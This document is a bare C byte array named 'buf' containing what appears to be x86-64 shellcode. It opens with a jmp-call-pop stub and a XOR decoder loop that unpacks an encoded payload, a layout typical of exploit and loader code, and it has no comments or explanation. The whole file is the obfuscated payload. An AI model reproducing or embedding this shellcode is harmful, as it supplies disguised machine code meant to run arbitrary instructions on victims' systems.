unsigned char buf[] = 
"\xeb\x27\x5b\x53\x5f\xb0\x47\xfc\xae\x75\xfd\x57\x59\x53"
"\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f"
"\xcb\xb5\x74\x07\x80\x3e\x47\x75\xea\xeb\xe6\xff\xe1\xe8"
"\xd4\xff\xff\xff\x04\x47\xef\x23\x5f\x57\x5b\xb4\x3b\xf8"
"\xaa\x71\xf9\x53\x5d\x57\x5a\x8e\x02\x34\x03\x4c\xfb\xc3"
"\x4c\xfb\xc2\x62\x85\x3b\x4d\x4e\x70\x03\x84\x3a\x3b\x71"
"\xee\xef\xe2\xfb\xe5\xec\xd0\xfb\xfb\xfb\x06\x3b\xbe\x06"
"\x06\x06\x06\xb9\x06\x06\x06\x06\x4e\xb8\x06\x06\x06\x06"
"\x06\x06\x06\x06\xbc\x05\x06\x06\x06\x09\x03\x4e\x8b\x32"
"\x23\x06\x06\x06\x06\x4e\x8b\x3a\x23\x06\x06\x06\x06\xbf"
"\x05\x06\x06\x06\xf5\xa0\x73\x24\xb9\x07\x06\x06\x06\x4e"
"\xb8\x06\x06\x06\x06\x06\x06\x06\x06\xbc\x02\x06\x06\x06"
"\xbe\x07\x06\x06\x06\x09\x03\xb9\x06\x06\x06\x06\xed\x03"
"\xb9\x07\x06\x06\x06\xbe\x3a\x06\x06\x06\x09\x03\x4d\x4e"
"\xcb\xb5";
